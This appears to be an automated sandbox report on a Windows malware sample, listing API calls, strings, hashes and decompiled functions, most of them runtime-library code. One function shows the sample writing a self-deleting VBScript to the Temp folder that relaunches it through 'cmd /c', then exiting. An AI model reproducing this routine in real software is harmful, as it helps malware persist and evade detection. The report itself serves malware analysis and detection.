0x0044d5ab
0x0044d5b0
0x0044d5bc
0x0044d5c9
0x0044d5d6
0x0044d5e9
0x00000000
0x0044d5eb
0x0044d5ed
0x0044d620
0x00000000
0x0044d622
0x0044d624
0x0044d628
0x0044d62e
0x0044d631
0x0044d633
0x0044d636
0x0044d636
0x0044d63b
0x00000000
0x00000000
0x0044d63d
0x0044d641
0x0044d64b
0x0044d650
0x00000000
0x0044d652
0x00000000
0x0044d652
0x0044d650
0x00000000
0x0044d641
0x0044d636
0x0044d631
0x00000000
0x0044d628
0x0044d5ef
0x0044d5f1
0x0044d5f5
0x0044d5fb
0x0044d5fe
0x0044d600
0x0044d600
0x0044d605
0x00000000
0x00000000
0x0044d607
0x0044d60b
0x0044d615
0x0044d61a
0x00000000
0x0044d61c
0x00000000
0x0044d61c
0x0044d61a
0x00000000
0x0044d60b
0x0044d600
0x0044d5fe
0x00000000
0x0044d5f5
0x0044d5ed
0x0044d5d8
0x0044d5d8
0x0044d5d8
0x00000000
0x0044d5d8
0x0044d5cb
0x0044d5cb
0x0044d5cd
0x0044d5be
0x0044d5be
0x0044d5c0
0x0044d5c0
0x0044d657
0x0044d657
0x0044d657
0x0044d664
0x0044d66a
0x0044d66f
0x0044d590
0x0044d675
0x0044d675
0x0044d67d
0x0044d681
0x0044d6dc
0x0044d6de
0x00000000
0x0044d683
0x0044d688
0x0044d68a
0x0044d68c
0x0044d694
0x0044d6b8
0x0044d6bd
0x0044d6c2
0x0044d6c8
0x00000000
0x0044d6ce
0x0044d6ce
0x00000000
0x0044d6ce
0x0044d696
0x0044d698
0x0044d69c
0x0044d6a1
0x0044d6a3
0x0044d6a8
0x0044d7bd
0x0044d7bd
0x0044d6ae
0x0044d6ae
0x0044d6d4
0x0044d6d4
0x0044d6d7
0x0044d6e1
0x0044d6e3
0x00000000
0x0044d6e9
0x0044d6f1
0x0044d6ff
0x00000000
0x0044d705
0x0044d70e
0x0044d714
0x0044d719
0x00000000
0x0044d71f
0x0044d71f
0x0044d722
0x0044d727
0x0044d72b
0x0044d777
0x00000000
0x0044d72d
0x0044d732
0x0044d734
0x0044d736
0x0044d73e
0x0044d75b
0x0044d765
0x0044d767
0x0044d76a
0x00000000
0x0044d76c
0x0044d76c
0x00000000
0x0044d76c
0x0044d740
0x0044d742
0x0044d746
0x0044d74b
0x0044d74f
0x0044d7b1
0x0044d7b1
0x0044d751
0x0044d751
0x0044d772
0x0044d772
0x0044d779
0x0044d77b
0x00000000
0x0044d794
0x0044d794
0x0044d7ad
0x0044d7ad
0x0044d77b
0x0044d74f
0x0044d73e
0x0044d7b5
0x0044d7ba
0x0044d719
0x0044d6ff
0x0044d6e3
0x0044d6a8
0x0044d694
0x0044d7c1
0x0044d7c7
0x0044d66f
0x0044d5b0
0x0044d57c
0x0044d7c9
0x0044d7dc

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044D80E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044D5E1
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044D80E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044D664
__alloca_probe_16.LIBCMT ref: 0044D69C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044D80E,?,0044D80E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044D6F7
__alloca_probe_16.LIBCMT ref: 0044D746
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044D80E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044D70E

Part of subcall function 0043E13D: RtlAllocateHeap.NTDLL(00000000,0042F6B9,?,?,00430DF7,?,?,00000000,?,?,0040B6B7,0042F6B9,?,?,?,?), ref: 0043E16F

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044D80E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044D78A
__freea.LIBCMT ref: 0044D7B5
__freea.LIBCMT ref: 0044D7C1

Strings

\^)|/, xrefs: 0044D53D

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \^)|/
API String ID: 201697637-265608074
Opcode ID: 52159a06fe9bf520039958b0b27b59fef8a5e6cffcb76e55820dde49e7576d3d
Instruction ID: 5b886a3c4b1656233a41e6e821f8d7fa8ac12404bf43836905d67236301eb607
Opcode Fuzzy Hash: 52159a06fe9bf520039958b0b27b59fef8a5e6cffcb76e55820dde49e7576d3d
Instruction Fuzzy Hash: C591B671E00216AEEF208E65CC41AEFBBB59F09758F14456BE905E7281DB3DDC41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044EDD4, Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FA1F), ref: 0044EDF7

Strings

acos, xrefs: 0044EF6F
exp, xrefs: 0044EEBC, 0044EF1E
@, xrefs: 0044EE6D, 0044EF07, 0044EFBF
log, xrefs: 0044EE9D, 0044EEA9
\^)|/, xrefs: 0044EDDC
asin, xrefs: 0044EF63
sqrt, xrefs: 0044EF7B
pow, xrefs: 0044EEDB, 0044EF87, 0044EF9A
log10, xrefs: 0044EE41, 0044EE91

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DecodePointer
String ID: \^)|/$acos$asin$exp$log$log10$pow$sqrt$@
API String ID: 3527080286-1810425786
Opcode ID: 311e4fcf838569fc3595c77221c05b0144216bd99dae7049a7570b48024b07bd
Instruction ID: e5af3ded6baeb13175fa0e8e520e4fcad39ff6ac38b4d973c685904740b4cd3e
Opcode Fuzzy Hash: 311e4fcf838569fc3595c77221c05b0144216bd99dae7049a7570b48024b07bd
Instruction Fuzzy Hash: EF51A071900619DBEF00DF6AE9485ADBBB0FF49305F204197E441B7255CB798E19CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B428, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B428(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				L0040F9AE();
				_t36 = E004023D3();
				_t37 = L00401EF9(0x46b540);
				_t40 = E004102F0(L00401EF9(0x46b4f8), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				L00402F9A(_t79,  &_v124, L00416CBE( &_v52, L00416A77( &_v76), _t140), 0, _t140, L".vbs");
				L00401E54();
				L00401F11();
				E00404303(_t79,  &_v100, L00402F9A(_t79,  &_v76, E0040412C(_t79,  &_v52, L00438F0F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401E54();
				L00401E54();
				L00401ED1(_t79,  &_v28);
				_t54 = E0040412C(_t79,  &_v196, L"\"\"\", 0");
				E00403205(L00402F9A(_t79,  &_v76, L00402F24( &_v52, L00402F9A(_t79,  &_v148, E0040412C(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				E0040720A(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401E4F( &_v100);
				_t68 = E004023D3();
				if(E004172C6(L00401E4F( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401E4F( &_v100), 0x464a0c, 0x464a0c, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401E54();
				L00401E54();
				return L00401E54();
			}

0x0040b428
0x0040b433
0x0040b43f
0x0040b447
0x0040b46b
0x0040b475
0x0040b477
0x0040b482
0x0040b482
0x0040b4a4
0x0040b4ad
0x0040b4b5
0x0040b4e7
0x0040b4f0
0x0040b4f8
0x0040b500
0x0040b515
0x0040b55a
0x0040b562
0x0040b56a
0x0040b575
0x0040b580
0x0040b58b
0x0040b598
0x0040b5a1
0x0040b5aa
0x0040b5c8
0x0040b5ed
0x0040b5ed
0x0040b5f6
0x0040b5fe
0x0040b610

APIs

Part of subcall function 0040F9AE: TerminateProcess.KERNEL32(00000000,0046B4E0,0040D3A4), ref: 0040F9BE
Part of subcall function 0040F9AE: WaitForSingleObject.KERNEL32(000000FF), ref: 0040F9D1

Part of subcall function 004102F0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046B4F8), ref: 0041030C
Part of subcall function 004102F0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410325
Part of subcall function 004102F0: RegCloseKey.ADVAPI32(00000000), ref: 00410330

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B482
ShellExecuteW.SHELL32(00000000,open,00000000,00464A0C,00464A0C,00000000), ref: 0040B5E1
ExitProcess.KERNEL32 ref: 0040B5ED

Strings

exepath, xrefs: 0040B45A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B590
Temp, xrefs: 0040B4C3
open, xrefs: 0040B5DB
""", 0, xrefs: 0040B50A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B522
.vbs, xrefs: 0040B488

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 8fec491f29398557c4bc8db91abcb955cd1878e90c173d07fc83545ef4ed5653
Instruction ID: 247ac2081307c404a14b2a00b516a8906e0906de9b43a7a40329ef39846b3d24
Opcode Fuzzy Hash: 8fec491f29398557c4bc8db91abcb955cd1878e90c173d07fc83545ef4ed5653
Instruction Fuzzy Hash: A7413A319001189ACB18F762DC56EEE7778AF50708F10017FF806B20E2EE785E8DCA99

Uniqueness

Uniqueness Score: -1.00%

Function 00434C3A, Relevance: 16.6, APIs: 11, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00434C3A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E00434BB7(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E00439BAF())) = 0x16;
					E0043600D();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E0043E13D(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E0043E13D(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E0043FC03(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E00439B79(GetLastError());
										}
									}
								}
								E0043E9A5(_t67);
							} else {
								E00439B79(GetLastError());
							}
						}
						E0043E9A5(_t64);
					} else {
						E00439B79(GetLastError());
					}
					goto L18;
				}
			}

0x00434c3a
0x00434c4a
0x00434c52
0x00434c54
0x00434c57
0x00434c5a
0x00434c5f
0x00434c74
0x00434c79
0x00434c7f
0x00434d51
0x00434d55
0x00434d5a
0x00434d5a
0x00434d68
0x00434d68
0x00434c61
0x00434c66
0x00000000
0x00000000
0x00434c68
0x00434c6d
0x00000000
0x00434c89
0x00434c92
0x00434c98
0x00434c9d
0x00434cba
0x00434cbc
0x00434cbf
0x00434cda
0x00434cf3
0x00434cf8
0x00434d08
0x00434d10
0x00434d15
0x00434d2e
0x00434d3f
0x00434d30
0x00434d37
0x00434d3c
0x00434d2e
0x00434d15
0x00434d43
0x00434cdc
0x00434ce3
0x00434ce3
0x00434d48
0x00434d4a
0x00434c9f
0x00434ca6
0x00434cab
0x00000000
0x00434c9d

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401C9D,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00434C92
GetLastError.KERNEL32(?,?,00401C9D,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00434C9F
__dosmaperr.LIBCMT ref: 00434CA6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401C9D,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00434CD2
GetLastError.KERNEL32(?,?,?,00401C9D,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00434CDC
__dosmaperr.LIBCMT ref: 00434CE3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401C9D,?), ref: 00434D26
GetLastError.KERNEL32(?,?,?,?,?,?,00401C9D,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00434D30
__dosmaperr.LIBCMT ref: 00434D37
_free.LIBCMT ref: 00434D43
_free.LIBCMT ref: 00434D4A

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: c486f87f708034c5650ac5229f8d6d95d25b99eb96178dff3413a331a076a2e8
Instruction ID: 43883f3740d888cca1308ff8d6db21b80c2190fad9d1dbc40eb18346a8beb470
Opcode Fuzzy Hash: c486f87f708034c5650ac5229f8d6d95d25b99eb96178dff3413a331a076a2e8
Instruction Fuzzy Hash: A731F17280020ABFDF119FA1CC059EF7B78EF8A364F10126AF910562A1DB38DD01DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043D3AB, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043D3AB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46900c; // 0x7c295e5c
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00440492(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = L0043CAF5(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043E13D(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb652
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = L0043FD84(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043603A();
									asm("int3");
									return  *0x46a508;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = L0043C802(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = L00447A8C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x4563b8, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = L00432E71( &_v528,  *0x469170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x4562f8; // 0x40df53
									 *0x452464(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x4692a8;
										if(_t228 != 0x4692a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												L0043E9A5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												L0043E9A5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb652
												L0043E9A5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb652
										L0043E9A5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										L0043E9A5(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0042F3BB(_v8 ^ _t262);
				}
				L47:
			}

0x0043d3ae
0x0043d3b6
0x0043d3bd
0x0043d3c0
0x0043d3c1
0x0043d3c4
0x0043d3c8
0x0043d3c9
0x0043d3cc
0x0043d3dc
0x0043d3e8
0x0043d3ff
0x0043d404
0x0043d409
0x0043d41e
0x0043d421
0x0043d421
0x0043d424
0x0043d42a
0x0043d433
0x0043d435
0x0043d438
0x0043d43f
0x0043d442
0x0043d448
0x00000000
0x00000000
0x0043d44a
0x0043d44e
0x0043d477
0x0043d477
0x0043d450
0x0043d450
0x0043d454
0x0043d458
0x0043d45f
0x0043d465
0x00000000
0x0043d467
0x0043d467
0x0043d46a
0x0043d46d
0x0043d475
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d475
0x0043d465
0x0043d484
0x0043d484
0x0043d486
0x0043d48c
0x0043d492
0x0043d495
0x0043d495
0x0043d498
0x0043d49b
0x0043d49b
0x0043d4ab
0x0043d4b9
0x0043d4be
0x0043d4c5
0x0043d4c7
0x00000000
0x0043d4cd
0x0043d4d3
0x0043d4d9
0x0043d4e0
0x0043d4e6
0x0043d4e9
0x0043d4ef
0x0043d4fc
0x0043d503
0x0043d508
0x0043d50b
0x0043d50d
0x0043d766
0x0043d76c
0x0043d76d
0x0043d76e
0x0043d76f
0x0043d770
0x0043d771
0x0043d776
0x0043d77c
0x0043d513
0x0043d513
0x0043d521
0x0043d524
0x0043d53f
0x0043d546
0x0043d54c
0x0043d552
0x0043d526
0x0043d526
0x0043d52e
0x00000000
0x0043d530
0x0043d530
0x0043d536
0x0043d536
0x0043d52e
0x0043d559
0x0043d55c
0x0043d679
0x0043d67c
0x0043d689
0x0043d68c
0x0043d694
0x0043d694
0x0043d67e
0x0043d684
0x0043d684
0x0043d562
0x0043d562
0x0043d568
0x0043d570
0x0043d572
0x0043d575
0x0043d57e
0x0043d587
0x0043d58d
0x0043d58d
0x0043d590
0x0043d592
0x00000000
0x00000000
0x0043d594
0x0043d59a
0x0043d59b
0x0043d5a6
0x0043d5ae
0x0043d5b6
0x0043d5b9
0x0043d5bc
0x0043d5c2
0x0043d5c8
0x0043d5ce
0x0043d5d4
0x0043d5d7
0x00000000
0x00000000
0x0043d5d9
0x0043d5fe
0x0043d5fe
0x0043d601
0x0043d605
0x0043d61e
0x0043d623
0x0043d626
0x0043d628
0x0043d62e
0x0043d669
0x0043d630
0x0043d630
0x0043d635
0x0043d63d
0x0043d63e
0x0043d63e
0x0043d655
0x0043d65c
0x0043d65f
0x0043d664
0x0043d664
0x0043d66c
0x0043d66f
0x0043d66f
0x0043d674
0x00000000
0x0043d674
0x0043d5db
0x0043d5dd
0x0043d5e2
0x0043d5e8
0x0043d5f1
0x0043d5fa
0x0043d5fa
0x00000000
0x0043d5dd
0x0043d697
0x0043d697
0x0043d69b
0x0043d6a3
0x0043d6a9
0x0043d6ac
0x0043d6b2
0x0043d6b4
0x0043d6f4
0x0043d6fa
0x0043d701
0x0043d701
0x0043d707
0x0043d70b
0x00000000
0x0043d70d
0x0043d70d
0x0043d711
0x0043d716
0x0043d71a
0x0043d71f
0x0043d726
0x0043d734
0x0043d73a
0x0043d73d
0x0043d73d
0x0043d70b
0x0043d74c
0x0043d754
0x0043d75d
0x0043d6b6
0x0043d6bc
0x0043d6bf
0x0043d6c6
0x0043d6d8
0x0043d6df
0x0043d6ec
0x00000000
0x0043d6ec
0x00000000
0x0043d6b4
0x0043d50d
0x0043d488
0x00000000
0x0043d488
0x00000000
0x0043d486
0x0043d47f
0x0043d481
0x0043d481
0x00000000
0x0043d40b
0x0043d40b
0x0043d40d
0x0043d41d
0x0043d41d
0x00000000

APIs

Part of subcall function 00440492: GetLastError.KERNEL32(?,00000000,0043A28E,?,00416AB2,-0046CD0C,?,?,?,?,?,0040AE92,.vbs), ref: 00440496
Part of subcall function 00440492: _free.LIBCMT ref: 004404C9
Part of subcall function 00440492: SetLastError.KERNEL32(00000000,?,00416AB2,-0046CD0C,?,?,?,?,?,0040AE92,.vbs), ref: 0044050A
Part of subcall function 00440492: _abort.LIBCMT ref: 00440510

_memcmp.LIBVCRUNTIME ref: 0043D655
_free.LIBCMT ref: 0043D6C6
_free.LIBCMT ref: 0043D6DF
_free.LIBCMT ref: 0043D711
_free.LIBCMT ref: 0043D71A
_free.LIBCMT ref: 0043D726

Strings

@, xrefs: 0043D6A3
C, xrefs: 0043D513
\^)|/, xrefs: 0043D3B6

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C$\^)|/$@
API String ID: 1679612858-1052628479
Opcode ID: a3183229f2b9dc0ffb84ee5aa1a1fbd94921bb1f7ba845c55821bc5589b3a6be
Instruction ID: 184a51f31d68e0a22b351593f6ef6972e56009d4827da6ae1fdc15574076d5fe
Opcode Fuzzy Hash: a3183229f2b9dc0ffb84ee5aa1a1fbd94921bb1f7ba845c55821bc5589b3a6be
Instruction Fuzzy Hash: 8BB14775E012199FDB24DF19D885BAEB7B4FF58304F6041AAE809A7350E734AE90CF48

Uniqueness

Uniqueness Score: -1.00%

Function 00442D9F, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00442D9F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
